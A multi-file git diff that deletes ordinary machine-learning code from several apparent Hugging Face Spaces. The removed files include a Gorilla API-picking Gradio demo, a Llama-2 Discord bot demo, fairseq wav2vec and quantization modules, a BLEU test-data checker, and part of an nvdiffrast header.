) - - self.decoder = PSPDecoder( - encoder_channels=self.encoder.out_channels, - use_batchnorm=psp_use_batchnorm, - out_channels=psp_out_channels, - dropout=psp_dropout, - ) - - self.segmentation_head = SegmentationHead( - in_channels=psp_out_channels, - out_channels=classes, - kernel_size=3, - activation=activation, - upsampling=upsampling, - ) - - if aux_params: - self.classification_head = ClassificationHead( - in_channels=self.encoder.out_channels[-1], **aux_params - ) - else: - self.classification_head = None - - self.name = "psp-{}".format(encoder_name) - self.initialize() diff --git a/spaces/gorilla-llm/gorilla-demo/app.py b/spaces/gorilla-llm/gorilla-demo/app.py deleted file mode 100644 index 235d9549807980ed24d63253676faf9af42e849c..0000000000000000000000000000000000000000 --- a/spaces/gorilla-llm/gorilla-demo/app.py +++ /dev/null @@ -1,112 +0,0 @@ -# Copyright 2023 https://github.com/ShishirPatil/gorilla -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. 
- - -import gradio as gr -import openai -import re - -# There is no need for an API key let the following be as is -openai.api_key = "EMPTY" - -# Set up the API base -openai.api_base = "http://zanino.millennium.berkeley.edu:8000/v1" -# If there is any issue try using -# openai.api_base = "http://34.132.127.197:8000/v1" - -# Define function to get Gorilla response -def get_gorilla_response(prompt, model="gorilla-7b-hf-v1"): - completion = openai.ChatCompletion.create( - model=model, - messages=[{"role": "user", "content": prompt}] - ) - return completion.choices[0].message.content - -# Define function to parse output -def parse_output(text, model): - if model == "gorilla-7b-hf-v1": - components = {} - components['domain'] = text.split("<<>>:")[1].split("<<>>")[0].strip() - components['api_call'] = text.split("<<>>:")[1].split("<<>>")[0].strip() - components['api_provider'] = text.split("<<>>:")[1].split("<<>>")[0].strip() - components['explanation'] = text.split("<<>>:")[1].split("<<>>")[0].strip() - components['code'] = text.split("<<>>:")[1].strip() - return components - elif model == "gorilla-mpt-7b-hf-v0": - keys_to_remove = ['api_call', 'api_provider', 'explanation', 'code'] - x = text.split(":") - x.pop(0) - for i in range(len(x)): - for key in keys_to_remove: - x[i] = x[i].replace(f'{key}','').replace(f", '{key}'", '').replace(f", '{key}':", '').replace(f"'{key}':", '').replace('''\\"''','''"''').replace('''"\\''','''"''').replace("""\'""","""'""").replace("""'\\""","""'""") - components = { - 'domain': x[0].strip("' ").replace("\n<<<","").replace('"','').replace('<','').replace('>',''), - 'api_call': x[1].strip("' ").replace("\n<<<","").replace('<','').replace('>',''), - 'api_provider': x[2].strip("' ").replace("\n<<","").replace('<','').replace('>',''), - 'explanation': x[3].strip("' ").replace(r'\n', '\n').replace('<','').replace('>',''), - 'code': x[4].strip("' ").replace(r'\n', '\n').replace('<','').replace('>','') - } - return components - elif model == "gorilla-7b-th-v0": - x = text.split(":") - keys_to_remove = ['api_call', 'api_provider', 'explanation', 'code'] - x.pop(0) - for i in range(len(x)): - for key in keys_to_remove: - x[i] = x[i].replace(f", '{key}'", '').replace(f", '{key}':", '').replace(f"'{key}':", '').replace('''\\"''','''"''').replace('''"\\''','''"''').replace("""\'""","""'""").replace("""'\\""","""'""") - components = { - 'domain': x[0].strip("' "), - 'api_call': x[1].strip("' "), - 'api_provider': x[2].strip("' "), - 'explanation': x[3].strip("' ").replace(r'\n', '\n'), - 'code': x[4].strip("' ").replace(r'\n', '\n') - } - return components - -# Define the function for the interface -def parse_and_display(prompt, model): - text = get_gorilla_response(prompt, model) - components = parse_output(text, model) - domain = components['domain'] - api_call = components['api_call'] - api_provider = components['api_provider'] - explanation = components['explanation'] - code = components['code'] - return domain, api_call, api_provider, explanation, code - -# Define example prompts -examples = [ - ["I would like to translate 'I feel very good today.' from English to French.","gorilla-7b-hf-v1"], - ["I want to build a robot that can detecting objects in an image ‘cat.jpeg’. 
Input: [‘cat.jpeg’]","gorilla-7b-hf-v1"], - ["I would like to translate from English to Chinese.","gorilla-7b-th-v0"], -] - -# Create the Gradio interface -iface = gr.Interface( - fn=parse_and_display, - inputs=["text", gr.components.Dropdown(["gorilla-7b-hf-v1", "gorilla-7b-th-v0", "gorilla-7b-tf-v0", "gorilla-mpt-7b-hf-v0"], label="Model")], - outputs=[ - gr.components.Textbox(label="Domain"), - gr.components.Textbox(label="API Call"), - gr.components.Textbox(label="API Provider"), - gr.components.Textbox(label="Explanation"), - gr.components.Code(label="Code") - ], - title="Gorilla Gradio Explorer", - description="Gorilla is an LLM that can pick the right API for your tasks. Check out the examples below. Learn more at gorilla.cs.berkeley.edu", - examples=examples, -) - -# Launch the interface and get the public gradio link -iface.launch() \ No newline at end of file diff --git a/spaces/gradio-discord-bots/llama-2-13b-chat-transformers/app.py b/spaces/gradio-discord-bots/llama-2-13b-chat-transformers/app.py deleted file mode 100644 index 65efc91ec03372d91dcc56a4c839c5b36058aca9..0000000000000000000000000000000000000000 --- a/spaces/gradio-discord-bots/llama-2-13b-chat-transformers/app.py +++ /dev/null @@ -1,80 +0,0 @@ -import gradio as gr -import torch -import os - -from model import get_input_token_length, run - -DEFAULT_SYSTEM_PROMPT = """\ -You are a helpful, respectful and honest assistant. Always answer as helpfully as possible, while being safe. Your answers should not include any harmful, unethical, racist, sexist, toxic, dangerous, or illegal content. Please ensure that your responses are socially unbiased and positive in nature.\n\nIf a question does not make any sense, or is not factually coherent, explain why instead of answering something not correct. If you don't know the answer to a question, please don't share false information.\ -""" -MAX_MAX_NEW_TOKENS = 2048 -DEFAULT_MAX_NEW_TOKENS = 1024 -MAX_INPUT_TOKEN_LENGTH = 4000 - - -LICENSE = """ -

    - ---- -As a derivate work of [Llama-2-13b-chat](https://huggingface.co/meta-llama/Llama-2-13b-chat) by Meta, -this demo is governed by the original [license](https://huggingface.co/spaces/huggingface-projects/llama-2-13b-chat/blob/main/LICENSE.txt) and [acceptable use policy](https://huggingface.co/spaces/huggingface-projects/llama-2-13b-chat/blob/main/USE_POLICY.md). -""" - -is_spaces = True if "SPACE_ID" in os.environ else False -if is_spaces : - is_shared_ui = True if "gradio-discord-bots/llama-2-13b-chat-transformers" in os.environ['SPACE_ID'] else False -else: - is_shared_ui = False -is_gpu_associated = torch.cuda.is_available() - - -def generate( - message: str, - history: list[tuple[str, str]], - system_prompt=DEFAULT_SYSTEM_PROMPT, - max_new_tokens=DEFAULT_MAX_NEW_TOKENS, - temperature=1.0, - top_p=0.95, - top_k=50, -) -> tuple[str, list[tuple[str, str]]]: - if is_shared_ui: - raise ValueError("Cannot use demo running in shared_ui. Must duplicate your own space.") - if max_new_tokens > MAX_MAX_NEW_TOKENS: - raise ValueError - - input_token_length = get_input_token_length(message, history, system_prompt) - if input_token_length > MAX_INPUT_TOKEN_LENGTH: - response = f'The accumulated input is too long ({input_token_length} > {MAX_INPUT_TOKEN_LENGTH}). Please create a new thread.' - else: - response = run(message, history, system_prompt, max_new_tokens, temperature, top_p, top_k) - return response - -interface = gr.ChatInterface(generate) - -with gr.Blocks() as demo: - - gr.Markdown( - """ - # Llama-2-13b-chat-hf Discord Bot Powered by Gradio and Hugging Face Transformers - - ### First install the `gradio_client` - - ```bash - pip install gradio_client - ``` - - ### Then deploy to discord in one line! ⚡️ - - ```python - secrets = {"HUGGING_FACE_HUB_TOKEN": "",} - client = grc.Client.duplicate("gradio-discord-bots/llama-2-13b-chat-transformers", secrets=secrets, hardware="a10g-small", sleep_timeout=2880) - client.deploy_discord(api_names=["chat"], hf_token="") - ``` - """ - ) - - gr.Markdown(LICENSE) - with gr.Row(visible=False): - interface.render() - -demo.queue(max_size=20).launch() diff --git a/spaces/gradio/HuBERT/examples/multilingual/data_scripts/check_iswlt_test_data.py b/spaces/gradio/HuBERT/examples/multilingual/data_scripts/check_iswlt_test_data.py deleted file mode 100644 index f8e2eb0f15699f1b458a8445d0c1dd6229a21f77..0000000000000000000000000000000000000000 --- a/spaces/gradio/HuBERT/examples/multilingual/data_scripts/check_iswlt_test_data.py +++ /dev/null @@ -1,67 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - - -import os, sys -import subprocess -import re -from subprocess import check_call, check_output - -WORKDIR_ROOT = os.environ.get('WORKDIR_ROOT', None) - -if WORKDIR_ROOT is None or not WORKDIR_ROOT.strip(): - print('please specify your working directory root in OS environment variable WORKDIR_ROOT. 
Exitting..."') - sys.exit(-1) - - -BLEU_REGEX = re.compile("^BLEU\\S* = (\\S+) ") -def run_eval_bleu(cmd): - output = check_output(cmd, shell=True, stderr=subprocess.STDOUT).decode("utf-8").strip() - print(output) - bleu = -1.0 - for line in output.strip().split('\n'): - m = BLEU_REGEX.search(line) - if m is not None: - bleu = m.groups()[0] - bleu = float(bleu) - break - return bleu - -def check_data_test_bleu(raw_folder, data_lang_pairs): - not_matchings = [] - for sacrebleu_set, src_tgts in data_lang_pairs: - for src_tgt in src_tgts: - print(f'checking test bleus for: {src_tgt} at {sacrebleu_set}') - src, tgt = src_tgt.split('-') - ssrc, stgt = src[:2], tgt[:2] - if os.path.exists(f'{raw_folder}/test.{tgt}-{src}.{src}'): - # reversed direction may have different test set - test_src = f'{raw_folder}/test.{tgt}-{src}.{src}' - else: - test_src = f'{raw_folder}/test.{src}-{tgt}.{src}' - cmd1 = f'cat {test_src} | sacrebleu -t "{sacrebleu_set}" -l {stgt}-{ssrc}; [ $? -eq 0 ] || echo ""' - test_tgt = f'{raw_folder}/test.{src}-{tgt}.{tgt}' - cmd2 = f'cat {test_tgt} | sacrebleu -t "{sacrebleu_set}" -l {ssrc}-{stgt}; [ $? -eq 0 ] || echo ""' - bleu1 = run_eval_bleu(cmd1) - if bleu1 != 100.0: - not_matchings.append(f'{sacrebleu_set}:{src_tgt} source side not matching: {test_src}') - bleu2 = run_eval_bleu(cmd2) - if bleu2 != 100.0: - not_matchings.append(f'{sacrebleu_set}:{src_tgt} target side not matching: {test_tgt}') - return not_matchings - -if __name__ == "__main__": - to_data_path = f'{WORKDIR_ROOT}/iwsltv2' - not_matching = check_data_test_bleu( - f'{to_data_path}/raw', - [ - ('iwslt17', ['en_XX-ar_AR', 'en_XX-ko_KR', 'ar_AR-en_XX', 'ko_KR-en_XX']), - ('iwslt17', ['en_XX-it_IT', 'en_XX-nl_XX', 'it_IT-en_XX', 'nl_XX-en_XX']), - ('iwslt17/tst2015', ['en_XX-vi_VN', "vi_VN-en_XX"]), - ] - ) - if len(not_matching) > 0: - print('the following datasets do not have matching test datasets:\n\t', '\n\t'.join(not_matching)) - diff --git a/spaces/gradio/HuBERT/fairseq/models/wav2vec/wav2vec.py b/spaces/gradio/HuBERT/fairseq/models/wav2vec/wav2vec.py deleted file mode 100644 index af6604da10f504baabff50bf14a6eb2214bffef3..0000000000000000000000000000000000000000 --- a/spaces/gradio/HuBERT/fairseq/models/wav2vec/wav2vec.py +++ /dev/null @@ -1,630 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. 
- -from dataclasses import dataclass, field -import logging -import math -from typing import Optional, Tuple -from omegaconf import II -import sys - -import torch -import torch.nn as nn -import torch.nn.functional as F -from fairseq.dataclass import ChoiceEnum, FairseqDataclass -from fairseq.models import BaseFairseqModel, register_model -from fairseq.modules import ( - Fp32GroupNorm, - Fp32LayerNorm, - GumbelVectorQuantizer, - KmeansVectorQuantizer, - TransposeLast, -) -from fairseq.tasks import FairseqTask -from fairseq.utils import buffered_arange - - -logger = logging.getLogger(__name__) - - -AGGREGATOR_CHOICES = ChoiceEnum(["cnn", "gru"]) -PROJECT_FEATURES_CHOICES = ChoiceEnum(["none", "same", "new"]) -ACTIVATION_CHOICES = ChoiceEnum(["relu", "gelu"]) -VQ_TYPE_CHOICES = ChoiceEnum(["none", "gumbel", "kmeans"]) - - -@dataclass -class Wav2VecConfig(FairseqDataclass): - prediction_steps: int = field( - default=12, metadata={"help": "number of steps ahead to predict"} - ) - sample_distance: Optional[int] = field( - default=None, - metadata={ - "help": "sample distance from target. does not work properly with cross-sampling" - }, - ) - cross_sample_negatives: int = field( - default=0, metadata={"help": "num of cross sampled negatives"} - ) - num_negatives: int = field( - default=10, metadata={"help": "num of sampled negatives"} - ) - conv_feature_layers: str = field( - default="[(512, 10, 5), (512, 8, 4), (512, 4, 2), (512, 4, 2), (512, 4, 2), (512, 1, 1), (512, 1, 1), (512, 1, 1)]", - metadata={ - "help": "convolutional feature extraction layers [(dim, kernel_size, stride), ...]" - }, - ) - conv_aggregator_layers: str = field( - default="[(512, 2, 1), (512, 3, 1), (512, 4, 1), (512, 5, 1), (512, 6, 1), (512, 7, 1), (512, 8, 1), (512, 9, 1), (512, 10, 1), (512, 11, 1), (512, 12, 1), (512, 13, 1)]", - metadata={ - "help": "convolutional aggregator layers [(dim, kernel_size, stride), ...]" - }, - ) - dropout: float = field( - default=0.0, metadata={"help": "dropout to apply within the model"} - ) - dropout_features: float = field( - default=0.0, metadata={"help": "dropout to apply to the features"} - ) - dropout_agg: float = field( - default=0.0, metadata={"help": "dropout to apply after aggregation step"} - ) - aggregator: AGGREGATOR_CHOICES = field( - default="cnn", metadata={"help": "type of aggregator to use"} - ) - gru_dim: int = field(default=512, metadata={"help": "GRU dimensionality"}) - no_conv_bias: bool = field( - default=False, metadata={"help": "if set, does not learn bias for conv layers"} - ) - agg_zero_pad: bool = field( - default=False, - metadata={"help": "if set, zero pads in aggregator instead of repl pad"}, - ) - skip_connections_feat: bool = field( - default=False, - metadata={"help": "if set, adds skip connections to the feature extractor"}, - ) - skip_connections_agg: bool = field( - default=True, - metadata={"help": "if set, adds skip connections to the aggregator"}, - ) - residual_scale: float = field( - default=0.5, metadata={"help": "scales residual by sqrt(value)"} - ) - log_compression: bool = field( - default=True, - metadata={"help": "if set, adds a log compression to feature extractor"}, - ) - balanced_classes: bool = field( - default=False, - metadata={"help": "if set, loss is scaled to balance for number of negatives"}, - ) - project_features: PROJECT_FEATURES_CHOICES = field( - default="none", - metadata={ - "help": "if not none, features are projected using the (same or new) aggregator" - }, - ) - non_affine_group_norm: bool = field( - default=False, 
metadata={"help": "if set, group norm is not affine"} - ) - offset: str = field( - default="auto", - metadata={ - "help": "if set to 'auto', it is computed automatically from the receptive field, else set to int value" - }, - ) - activation: ACTIVATION_CHOICES = field( - default="relu", - metadata={ - "help": "if set to 'auto', it is computed automatically from the receptive field, else set to int value" - }, - ) - vq_type: VQ_TYPE_CHOICES = field( - default="none", metadata={"help": "which type of quantizer to use"} - ) - vq_vars: int = field( - default=320, - metadata={"help": "project to this many vector quantized variables per group"}, - ) - vq_groups: int = field( - default=2, metadata={"help": "number of groups of latent variables"} - ) - vq_dim: int = field( - default=0, - metadata={ - "help": "uses this dimensionality for quantized vectors. 0 to use model dim // groups" - }, - ) - vq_depth: int = field( - default=1, metadata={"help": "number of layers for vq weight projection"} - ) - combine_groups: bool = field( - default=False, metadata={"help": "if set, variables are shared among groups"} - ) - vq_temp: Tuple[float, float, float] = field( - default=(2.0, 0.5, 0.999995), - metadata={ - "help": "temperature for latent variable sampling with gumbel softmax. should be a tuple of 3 values (start, end, decay)" - }, - ) - vq_gamma: float = field( - default=0.25, - metadata={"help": "gamma parameter for kmeans style vector quantization"}, - ) - infonce: bool = II("criterion.infonce") - - -@register_model("wav2vec", dataclass=Wav2VecConfig) -class Wav2VecModel(BaseFairseqModel): - @classmethod - def build_model(cls, cfg: Wav2VecConfig, task: FairseqTask): - """Build a new model instance.""" - - model = Wav2VecModel(cfg) - logger.info(model) - return model - - def __init__(self, cfg: Wav2VecConfig): - super().__init__() - - self.prediction_steps = cfg.prediction_steps - offset = cfg.offset - - if cfg.activation == "relu": - activation = nn.ReLU() - elif cfg.activation == "gelu": - activation = nn.GELU() - else: - raise Exception("unknown activation " + cfg.activation) - - feature_enc_layers = eval(cfg.conv_feature_layers) - self.feature_extractor = ConvFeatureExtractionModel( - conv_layers=feature_enc_layers, - dropout=0.0, - log_compression=cfg.log_compression, - skip_connections=cfg.skip_connections_feat, - residual_scale=cfg.residual_scale, - non_affine_group_norm=cfg.non_affine_group_norm, - activation=activation, - ) - embed = feature_enc_layers[-1][0] - - self.vector_quantizer = None - if cfg.vq_type == "gumbel": - self.vector_quantizer = GumbelVectorQuantizer( - dim=embed, - num_vars=cfg.vq_vars, - temp=cfg.vq_temp, - groups=cfg.vq_groups, - combine_groups=cfg.combine_groups, - vq_dim=cfg.vq_dim if cfg.vq_dim > 0 else embed, - time_first=False, - activation=activation, - weight_proj_depth=cfg.vq_depth, - weight_proj_factor=2, - ) - elif cfg.vq_type == "kmeans": - self.vector_quantizer = KmeansVectorQuantizer( - dim=embed, - num_vars=cfg.vq_vars, - groups=cfg.vq_groups, - combine_groups=cfg.combine_groups, - vq_dim=cfg.vq_dim if cfg.vq_dim > 0 else embed, - time_first=False, - gamma=cfg.vq_gamma, - ) - else: - assert ( - cfg.vq_type == "none" or cfg.vq_type is None - ), "Unknown quantizer type" - - if cfg.offset == "auto": - jin = 0 - rin = 0 - for _, k, stride in feature_enc_layers: - if rin == 0: - rin = k - rin = rin + (k - 1) * jin - if jin == 0: - jin = stride - else: - jin *= stride - offset = math.ceil(rin / jin) - - offset = int(offset) - - def make_aggregator(): - if 
cfg.aggregator == "cnn": - agg_layers = eval(cfg.conv_aggregator_layers) - agg_dim = agg_layers[-1][0] - feature_aggregator = ConvAggegator( - conv_layers=agg_layers, - embed=embed, - dropout=cfg.dropout, - skip_connections=cfg.skip_connections_agg, - residual_scale=cfg.residual_scale, - non_affine_group_norm=cfg.non_affine_group_norm, - conv_bias=not cfg.no_conv_bias, - zero_pad=cfg.agg_zero_pad, - activation=activation, - ) - elif cfg.aggregator == "gru": - agg_dim = cfg.gru_dim - feature_aggregator = nn.Sequential( - TransposeLast(), - nn.GRU( - input_size=embed, - hidden_size=agg_dim, - num_layers=1, - dropout=cfg.dropout, - ), - TransposeLast(deconstruct_idx=0), - ) - else: - raise Exception("unknown aggregator type " + cfg.aggregator) - - return feature_aggregator, agg_dim - - self.feature_aggregator, agg_dim = make_aggregator() - - self.wav2vec_predictions = Wav2VecPredictionsModel( - in_dim=agg_dim, - out_dim=embed, - prediction_steps=cfg.prediction_steps, - n_negatives=cfg.num_negatives, - cross_sample_negatives=cfg.cross_sample_negatives, - sample_distance=cfg.sample_distance, - dropout=cfg.dropout, - offset=offset, - balanced_classes=cfg.balanced_classes, - infonce=cfg.infonce, - ) - - self.dropout_feats = nn.Dropout(p=cfg.dropout_features) - self.dropout_agg = nn.Dropout(p=cfg.dropout_agg) - - if cfg.project_features == "none": - self.project_features = None - elif cfg.project_features == "same": - self.project_features = self.feature_aggregator - elif cfg.project_features == "new": - self.project_features, _ = make_aggregator() - - def forward(self, source): - result = {} - - features = self.feature_extractor(source) - if self.vector_quantizer: - q_res = self.vector_quantizer(features) - features = q_res["x"] - for k in q_res.keys(): - if k != "x": - result[k] = q_res[k] - - x = self.dropout_feats(features) - x = self.feature_aggregator(x) - x = self.dropout_agg(x) - - if self.project_features is not None: - features = self.project_features(features) - x, targets = self.wav2vec_predictions(x, features) - result["cpc_logits"] = x - result["cpc_targets"] = targets - - return result - - def upgrade_state_dict_named(self, state_dict, name): - super().upgrade_state_dict_named(state_dict, name) - - def max_positions(self): - """Maximum length supported by the model.""" - return sys.maxsize - - def get_logits(self, net_output): - logits = net_output["cpc_logits"] - return logits - - def get_targets(self, sample, net_output): - t = net_output["cpc_targets"] - if isinstance(t, tuple): - t = t[0] - return t.contiguous() - - def get_target_weights(self, targets, net_output): - targets = net_output["cpc_targets"] - if isinstance(targets, tuple) and targets[-1] is not None: - return targets[-1] - return None - - def get_extra_losses(self, net_output): - loss = None - if "prob_perplexity" in net_output: - loss = net_output["num_vars"] - net_output["prob_perplexity"] - elif "kmeans_loss" in net_output: - loss = net_output["kmeans_loss"] - - return loss - - -def norm_block(is_layer_norm, dim, affine=True): - if is_layer_norm: - mod = nn.Sequential( - TransposeLast(), - Fp32LayerNorm(dim, elementwise_affine=affine), - TransposeLast(), - ) - else: - mod = Fp32GroupNorm(1, dim, affine=affine) - - return mod - - -class ConvFeatureExtractionModel(nn.Module): - def __init__( - self, - conv_layers, - dropout, - log_compression, - skip_connections, - residual_scale, - non_affine_group_norm, - activation, - ): - super().__init__() - - def block(n_in, n_out, k, stride): - return nn.Sequential( - 
nn.Conv1d(n_in, n_out, k, stride=stride, bias=False), - nn.Dropout(p=dropout), - norm_block( - is_layer_norm=False, dim=n_out, affine=not non_affine_group_norm - ), - activation, - ) - - in_d = 1 - self.conv_layers = nn.ModuleList() - for dim, k, stride in conv_layers: - self.conv_layers.append(block(in_d, dim, k, stride)) - in_d = dim - - self.log_compression = log_compression - self.skip_connections = skip_connections - self.residual_scale = math.sqrt(residual_scale) - - def forward(self, x): - # BxT -> BxCxT - x = x.unsqueeze(1) - - for conv in self.conv_layers: - residual = x - x = conv(x) - if self.skip_connections and x.size(1) == residual.size(1): - tsz = x.size(2) - r_tsz = residual.size(2) - residual = residual[..., :: r_tsz // tsz][..., :tsz] - x = (x + residual) * self.residual_scale - - if self.log_compression: - x = x.abs() - x = x + 1 - x = x.log() - - return x - - -class ZeroPad1d(nn.Module): - def __init__(self, pad_left, pad_right): - super().__init__() - self.pad_left = pad_left - self.pad_right = pad_right - - def forward(self, x): - return F.pad(x, (self.pad_left, self.pad_right)) - - -class ConvAggegator(nn.Module): - def __init__( - self, - conv_layers, - embed, - dropout, - skip_connections, - residual_scale, - non_affine_group_norm, - conv_bias, - zero_pad, - activation, - ): - super().__init__() - - def block(n_in, n_out, k, stride): - # padding dims only really make sense for stride = 1 - ka = k // 2 - kb = ka - 1 if k % 2 == 0 else ka - - pad = ( - ZeroPad1d(ka + kb, 0) if zero_pad else nn.ReplicationPad1d((ka + kb, 0)) - ) - - return nn.Sequential( - pad, - nn.Conv1d(n_in, n_out, k, stride=stride, bias=conv_bias), - nn.Dropout(p=dropout), - norm_block(False, n_out, affine=not non_affine_group_norm), - activation, - ) - - in_d = embed - self.conv_layers = nn.ModuleList() - self.residual_proj = nn.ModuleList() - for dim, k, stride in conv_layers: - if in_d != dim and skip_connections: - self.residual_proj.append(nn.Conv1d(in_d, dim, 1, bias=False)) - else: - self.residual_proj.append(None) - - self.conv_layers.append(block(in_d, dim, k, stride)) - in_d = dim - self.conv_layers = nn.Sequential(*self.conv_layers) - self.skip_connections = skip_connections - self.residual_scale = math.sqrt(residual_scale) - - def forward(self, x): - for rproj, conv in zip(self.residual_proj, self.conv_layers): - residual = x - x = conv(x) - if self.skip_connections: - if rproj is not None: - residual = rproj(residual) - x = (x + residual) * self.residual_scale - return x - - -class Wav2VecPredictionsModel(nn.Module): - def __init__( - self, - in_dim, - out_dim, - prediction_steps, - n_negatives, - cross_sample_negatives, - sample_distance, - dropout, - offset, - balanced_classes, - infonce, - ): - super().__init__() - - self.n_negatives = n_negatives - self.cross_sample_negatives = cross_sample_negatives - self.sample_distance = sample_distance - self.project_to_steps = nn.ConvTranspose2d( - in_dim, out_dim, (1, prediction_steps) - ) - self.dropout = nn.Dropout(p=dropout) - self.offset = offset - self.balanced_classes = balanced_classes - self.infonce = infonce - - def sample_negatives(self, y): - bsz, fsz, tsz = y.shape - - y = y.transpose(0, 1) # BCT -> CBT - y = y.contiguous().view(fsz, -1) # CBT => C(BxT) - - cross_high = tsz * bsz - high = tsz if self.sample_distance is None else min(tsz, self.sample_distance) - assert high > 1 - - neg_idxs = torch.randint(low=0, high=high, size=(bsz, self.n_negatives * tsz)) - - with torch.no_grad(): - if self.n_negatives > 0: - tszs = ( - 
buffered_arange(tsz) - .unsqueeze(-1) - .expand(-1, self.n_negatives) - .flatten() - ) - - neg_idxs = torch.randint( - low=0, high=high - 1, size=(bsz, self.n_negatives * tsz) - ) - neg_idxs[neg_idxs >= tszs] += 1 - - if self.cross_sample_negatives > 0: - tszs = ( - buffered_arange(tsz) - .unsqueeze(-1) - .expand(-1, self.cross_sample_negatives) - .flatten() - ) - - cross_neg_idxs = torch.randint( - low=0, - high=cross_high - 1, - size=(bsz, self.cross_sample_negatives * tsz), - ) - cross_neg_idxs[cross_neg_idxs >= tszs] += 1 - - if self.n_negatives > 0: - for i in range(1, bsz): - neg_idxs[i] += i * high - else: - neg_idxs = cross_neg_idxs - - if self.cross_sample_negatives > 0 and self.n_negatives > 0: - neg_idxs = torch.cat([neg_idxs, cross_neg_idxs], dim=1) - - negs = y[..., neg_idxs.view(-1)] - negs = negs.view( - fsz, bsz, self.n_negatives + self.cross_sample_negatives, tsz - ).permute( - 2, 1, 0, 3 - ) # to NxBxCxT - - return negs - - def forward(self, x, y): - - x = x.unsqueeze(-1) - x = self.project_to_steps(x) # BxCxTxS - x = self.dropout(x) - - negatives = self.sample_negatives(y) - y = y.unsqueeze(0) - targets = torch.cat([y, negatives], dim=0) # Copies x B x C x T - - copies = targets.size(0) - bsz, dim, tsz, steps = x.shape - steps = min(steps, tsz - self.offset) - - predictions = x.new( - bsz * copies * (tsz - self.offset + 1) * steps - - ((steps + 1) * steps // 2) * copies * bsz - ) - if self.infonce: - labels = predictions.new_full( - (predictions.shape[0] // copies,), 0, dtype=torch.long - ) - else: - labels = torch.zeros_like(predictions) - weights = ( - torch.full_like(labels, 1 / self.n_negatives) - if self.balanced_classes and not self.infonce - else None - ) - - start = end = 0 - for i in range(steps): - offset = i + self.offset - end = start + (tsz - offset) * bsz * copies - if self.infonce: - predictions[start:end] = torch.einsum( - "bct,nbct->tbn", x[..., :-offset, i], targets[..., offset:] - ).flatten() - else: - pos_num = (end - start) // copies - predictions[start:end] = torch.einsum( - "bct,nbct->nbt", x[..., :-offset, i], targets[..., offset:] - ).flatten() - labels[start : start + pos_num] = 1.0 - if weights is not None: - weights[start : start + pos_num] = 1.0 - start = end - assert end == predictions.numel(), "{} != {}".format(end, predictions.numel()) - - if self.infonce: - predictions = predictions.view(-1, copies) - else: - if weights is not None: - labels = (labels, weights) - - return predictions, labels diff --git a/spaces/gradio/HuBERT/fairseq/modules/quantization/scalar/utils.py b/spaces/gradio/HuBERT/fairseq/modules/quantization/scalar/utils.py deleted file mode 100644 index 32cf616568160004bd97a673f2d85923974c1fae..0000000000000000000000000000000000000000 --- a/spaces/gradio/HuBERT/fairseq/modules/quantization/scalar/utils.py +++ /dev/null @@ -1,77 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. 
- -import logging -from operator import attrgetter - -import torch.distributed as dist -import torch.nn as nn - -from ..pq.utils import attrsetter, get_layers -from .modules import ActivationQuantizer, IntConv2d, IntEmbedding, IntLinear - - -MAPPING = {nn.Linear: IntLinear, nn.Embedding: IntEmbedding, nn.Conv2d: IntConv2d} - - -def quantize_model_(model, p=0.2, bits=8, update_step=3000): - """ - Replaces all modules with their scalar quantized counterpart and - registers hooks to quantize the post-ativations of those modules. - - Args: - - model: a nn.Module - - p: amount of noise (0 for no noise, 1 to quantize all the weights/activations) - - bits: number of bits - - update_step: update quantization parameters every update_step steps - """ - - # quantize all layers - quantized_layers = get_layers(model, "(.*?)") - - for layer in quantized_layers: - - # book-keeping - is_master_process = (not dist.is_initialized()) or ( - dist.is_initialized() and dist.get_rank() == 0 - ) - - # recover module - module = attrgetter(layer)(model) - if is_master_process: - logging.info( - f"Quantizing layer {layer} with bits={bits} and QuantNoise={p}" - ) - - # quantization params - q_params = { - "p": p, - "update_step": update_step, - "bits": bits, - "method": "histogram", - "counter": 0, - } - - # instantiate the quantized counterpart - if isinstance(module, tuple(MAPPING.keys())): - QuantizedModule = MAPPING[module.__class__] - quantized_module = QuantizedModule.__new__(QuantizedModule) - params = module.__dict__ - params.update(q_params) - quantized_module.__dict__.update(params) - - else: - if is_master_process: - logging.info(f"Module {module} not yet supported for quantization") - continue - - # activation quantization - a_q = ActivationQuantizer(quantized_module, p=0, bits=bits, method="histogram") - - # replace layer by its quantized counterpart - attrsetter(layer)(model, quantized_module) - - # return name of quantized layers - return quantized_layers diff --git a/spaces/gwang-kim/DATID-3D/pose_estimation/nvdiffrast/nvdiffrast/common/rasterize.h b/spaces/gwang-kim/DATID-3D/pose_estimation/nvdiffrast/nvdiffrast/common/rasterize.h deleted file mode 100644 index 6905b98508ea540729a1eae1bfb71af0f4033520..0000000000000000000000000000000000000000 --- a/spaces/gwang-kim/DATID-3D/pose_estimation/nvdiffrast/nvdiffrast/common/rasterize.h +++ /dev/null @@ -1,97 +0,0 @@ -// Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved. -// -// NVIDIA CORPORATION and its licensors retain all intellectual property -// and proprietary rights in and to this software, related documentation -// and any modifications thereto. Any use, reproduction, disclosure or -// distribution of this software and related documentation without an express -// license agreement from NVIDIA CORPORATION is strictly prohibited. - -#pragma once - -//------------------------------------------------------------------------ -// Constants and helpers. - -#define RAST_GRAD_MAX_KERNEL_BLOCK_WIDTH 8 -#define RAST_GRAD_MAX_KERNEL_BLOCK_HEIGHT 8 - -//------------------------------------------------------------------------ -// Gradient CUDA kernel params. - -struct RasterizeGradParams -{ - const float* pos; // Incoming position buffer. - const int* tri; // Incoming triangle buffer. - const float* out; // Rasterizer output buffer. - const float* dy; // Incoming gradients of rasterizer output buffer. - const float* ddb; // Incoming gradients of bary diff output buffer. - float* grad; // Outgoing position gradients. 
